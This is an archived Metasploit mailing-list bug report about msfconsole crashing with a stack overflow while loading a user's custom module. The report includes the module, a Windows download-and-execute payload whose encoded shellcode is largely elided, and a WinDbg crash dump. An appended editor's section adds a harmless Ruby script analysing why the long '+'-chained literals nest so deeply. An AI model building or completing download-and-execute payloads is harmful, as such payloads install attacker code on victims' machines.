Metasploit mailing list archives
Trying to create my own payload resulted in stack overflow
From: herzel levy <herzelevy () gmail com>
Date: Thu, 2 Dec 2010 21:55:18 +0200
Hi,
I'm not experienced with developing for the framework or reporting bugs, and I
hope I'm doing it the right way.
I was trying to create an encoded version of the Download_Exec.rb payload
using the shikata ga nai and the alpha upper encoders, which resulted in a
very big payload. I put my payload at
'msf3\modules\payloads\singles\windows' and started Metasploit.
Metasploit then crashed with a stack overflow error. I attached the crash
dump and the payload I created.
Metasploit version: 3.5.1-dev.11003
Environment: Win7 x86
*The payload looks something like this:*

require 'msf/core'
require 'msf/core/payload/windows/exec'

module Metasploit3

  include Msf::Payload::Windows
  include Msf::Payload::Single

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Windows Executable Download and Execute',
      'Version'     => '$Revision: 9488 $',
      'Description' => 'Download an EXE from an HTTP URL and execute it',
      'Author'      => [ 'lion[at]cnhonker.com', 'pita[at]mail.com' ],
      'License'     => BSD_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X86,
      'Privileged'  => false,
      'Payload'     =>
        {
          'Offsets' => { },
          # Pre-encoded (shikata_ga_nai + alpha_upper) shellcode, pasted in
          # as one long chain of string literals joined with '+'
          'Payload' =>
            "\xb8\xf3\x11\x7c\xdb\x29\xc9\x66\xb9\x30\x3c\xdb\xd4\xd9" +
            "\x74\x24\xf4\x5f\x31\x47\x11\x03\x47\x11\x83\xef\xfc\xe2" +
            "\x06\x20\xb5\x65\x99\xa8\x39\x7d\x3f\x96\xeb\xbd\x66\x2a" +
            "\x32\xc9\xbc\x5f\x9a\x03\xcb\x8f\x26\x13\x23\x33\xc7\x27" +
            "\xd0\x2d\xbe\xfe\x3d\x9a\x2c\xd3\xa5\xc8\x38\x26\xab\x48" +
            "\x00\xad\xbb\x53\xea\xf5\x5e\x10\xd0\xae\xe3\x39\xa2\xfa" +
            ........................................ (1670 lines more like these...)
        }
      ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
      ], self.class)
  end

  #
  # Constructs the payload: returns the pre-encoded bytes from module_info
  # as they are (the URL option registered above is not appended here)
  #
  def generate_stage
    return module_info['Payload']['Payload']
  end

end
*WinDbg crash dump:*
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0046c000 C:\framework\ruby\bin\ruby.exe
ModLoad: 77920000 77a5c000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76930000 76a04000 C:\Windows\system32\kernel32.dll
ModLoad: 75b40000 75b8a000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 62d00000 62f23000 C:\framework\ruby\bin\msvcrt-ruby191.dll
ModLoad: 76400000 764a0000 C:\Windows\system32\ADVAPI32.DLL
ModLoad: 76260000 7630c000 C:\Windows\system32\msvcrt.dll
ModLoad: 77660000 77679000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76720000 767c1000 C:\Windows\system32\RPCRT4.dll
ModLoad: 765a0000 765ca000 C:\Windows\system32\IMAGEHLP.DLL
ModLoad: 76a10000 77659000 C:\Windows\system32\SHELL32.DLL
ModLoad: 75f30000 75f87000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 77a70000 77abe000 C:\Windows\system32\GDI32.dll
ModLoad: 764b0000 76579000 C:\Windows\system32\USER32.dll
ModLoad: 77a60000 77a6a000 C:\Windows\system32\LPK.dll
ModLoad: 76360000 763fd000 C:\Windows\system32\USP10.dll
ModLoad: 76220000 76255000 C:\Windows\system32\WS2_32.DLL
ModLoad: 75d70000 75d76000 C:\Windows\system32\NSI.dll
ModLoad: 76580000 7659f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75de0000 75eac000 C:\Windows\system32\MSCTF.dll
ModLoad: 10000000 1003c000 C:\framework\tools\ConsoleHook.dll
ModLoad: 752d0000 752e6000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 750a0000 750db000 C:\Windows\system32\rsaenh.dll
ModLoad: 757b0000 757bc000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 71280000 71288000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\encdb.so
ModLoad: 6ac40000 6ac47000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\iso_8859_8.so
ModLoad: 6dd40000 6dd48000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\transdb.so
ModLoad: 65480000 65487000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16le.so
ModLoad: 6d400000 6d408000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\utf_16_32.so
ModLoad: 628c0000 628db000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\single_byte.so
ModLoad: 69800000 69807000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\md5.so
ModLoad: 6c640000 6c76b000 C:\framework\ruby\bin\libeay32-0.9.8-msvcrt.dll
ModLoad: 75870000 75877000 C:\Windows\system32\WSOCK32.DLL
ModLoad: 68000000 68009000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest.so
ModLoad: 65080000 6508b000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\stringio.so
ModLoad: 61c80000 61c90000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\iconv.so
ModLoad: 68080000 68174000 C:\framework\ruby\bin\libiconv2.dll
ModLoad: 6a400000 6a423000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\zlib.so
ModLoad: 6c280000 6c29a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\dl.so
ModLoad: 65000000 65007000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\etc.so
ModLoad: 767d0000 7692c000 C:\Windows\system32\ole32.dll
ModLoad: 74570000 745b0000 C:\Windows\system32\uxtheme.dll
ModLoad: 74740000 748de000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
ModLoad: 77ac0000 77b4f000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 77780000 7791d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75af0000 75b17000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 75b20000 75b32000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 76190000 76213000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 745d0000 746c5000 C:\Windows\system32\propsys.dll
ModLoad: 743b0000 743d1000 C:\Windows\system32\ntmarta.dll
ModLoad: 76310000 76355000 C:\Windows\system32\WLDAP32.dll
ModLoad: 69980000 69987000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\continuation.so
ModLoad: 6e600000 6e624000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\socket.so
ModLoad: 6a1c0000 6a1c7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\fcntl.so
ModLoad: 671c0000 6720a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\openssl.so
ModLoad: 6b380000 6b3c0000 C:\framework\ruby\bin\ssleay32-0.9.8-msvcrt.dll
ModLoad: 00770000 0078f000 C:\framework\ruby\bin\ZLIB1.dll
ModLoad: 67300000 67307000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\shift_jis.so
ModLoad: 65600000 6560a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\strscan.so
ModLoad: 6ce00000 6ce2a000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\syck.so
ModLoad: 75970000 7597b000 C:\Windows\system32\profapi.dll
ModLoad: 652c0000 652c7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\sha1.so
ModLoad: 64800000 64807000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\euc_jp.so
ModLoad: 75760000 757ab000 C:\Windows\system32\apphelp.dll
ModLoad: 6a640000 6a658000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\bigdecimal.so
ModLoad: 6fac0000 6fac9000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\parser.so
ModLoad: 70f40000 70f47000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16be.so
ModLoad: 6ffc0000 6ffc7000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32be.so
ModLoad: 6d100000 6d107000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32le.so
ModLoad: 6adc0000 6adcd000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\generator.so
ModLoad: 70380000 704a1000 C:\framework\ruby\lib\ruby\gems\1.9.1\gems\pg-0.9.0-x86-mingw32\lib\1.9\pg_ext.so
ModLoad: 755c0000 755c8000 C:\Windows\system32\SECUR32.dll
ModLoad: 75740000 7575a000 C:\Windows\system32\SSPICLI.DLL
ModLoad: 75290000 752cc000 C:\Windows\system32\mswsock.dll
ModLoad: 74df0000 74df5000 C:\Windows\System32\wshtcpip.dll
ModLoad: 61b80000 61bbb000 C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\nkf.so
(c54.1180): Stack overflow - code c00000fd (!!! second chance !!!)
eax=067c1298 ebx=0000002b ecx=065ac890 edx=000331a0 esi=00000022 edi=00000000
eip=62e3eafd esp=00032ee0 ebp=00033398 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\framework\ruby\bin\msvcrt-ruby191.dll -
msvcrt_ruby191!rb_iseq_translate_threaded_code+0x383d:
62e3eafd 89bd2cfcffff    mov dword ptr [ebp-3D4h],edi ss:0023:00032fc4=00000000
Cheers,
Herzel
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
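Editor's added example (not part of Herzel's message and not code from the Metasploit project). The dump above faults inside msvcrt-ruby191.dll while msfconsole is loading the module, and the only function name WinDbg could offer is an export-symbol guess, as the dump itself says. One reading consistent with that, offered here as an assumption rather than a confirmed root cause, is the shape of the pasted shellcode: some 1676 string literals joined with `+` parse as left-nested method calls, ((a + b) + c) + d and so on, so the syntax tree is as deep as the number of lines and the interpreter walks it recursively when it compiles the file. The script below, with made-up names (SAMPLE_BLOB, plus_chain_source, hex_pack_source, plus_depth, bytes_from_source) and a constructed byte string in place of the real payload, builds the same two layouts from one blob, measures how deeply each nests with Ripper, and checks that both evaluate to the same bytes.

```ruby
require 'ripper'

# Constructed stand-in for the pre-encoded shellcode (2000 arbitrary bytes),
# not the payload from the report.
SAMPLE_BLOB = (0...2000).map { |i| (i * 73 + 17) & 0xff }.pack('C*')

# Escape a binary chunk as a double-quoted Ruby literal of \xNN escapes,
# the way msfencode's ruby output writes shellcode.
def ruby_literal(bytes)
  '"' + bytes.unpack('C*').map { |b| format('\x%02x', b) }.join + '"'
end

# Layout used by the posted module: one literal per line, joined with '+'.
# Ruby parses this as (((a + b) + c) + d) ..., so the expression nests as
# deep as there are chunks.
def plus_chain_source(blob, chunk_size = 14)
  chunks = blob.bytes.each_slice(chunk_size).map { |s| s.pack('C*') }
  chunks.map { |c| ruby_literal(c) }.join(" +\n")
end

# Flat alternative: one hex literal decoded at runtime.  The parser sees a
# single string and a single method call, whatever the blob size.
def hex_pack_source(blob)
  "[#{blob.unpack('H*').first.inspect}].pack('H*')"
end

# Deepest nesting of :binary nodes (infix operator calls) in the
# S-expression Ripper builds for `node`.  A '+' chain of n literals nests
# n - 1 deep; a form with no infix operators scores 0.
def binary_nesting(node)
  return 0 unless node.is_a?(Array)
  inner = node.map { |child| binary_nesting(child) }.max || 0
  node.first == :binary ? inner + 1 : inner
end

def plus_depth(src)
  sexp = Ripper.sexp(src)
  raise ArgumentError, 'source does not parse' if sexp.nil?
  binary_nesting(sexp)
end

# Evaluate a generated fragment and return the bytes it yields, so the two
# layouts can be checked against the original blob.
def bytes_from_source(src)
  eval(src).bytes
end

if __FILE__ == $0
  chain = plus_chain_source(SAMPLE_BLOB)
  flat  = hex_pack_source(SAMPLE_BLOB)
  puts "plus chain: #{chain.lines.size} lines, binary nesting #{plus_depth(chain)}"
  puts "hex pack:   #{flat.lines.size} line,  binary nesting #{plus_depth(flat)}"
  puts "same bytes: #{bytes_from_source(chain) == bytes_from_source(flat)}"
end
```

Run as a script it prints the nesting figures for both layouts. When pasting large msfencode output into a module, the flat form (or an array of literals joined at runtime) is the one to reach for, since its parse depth does not grow with the size of the shellcode.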
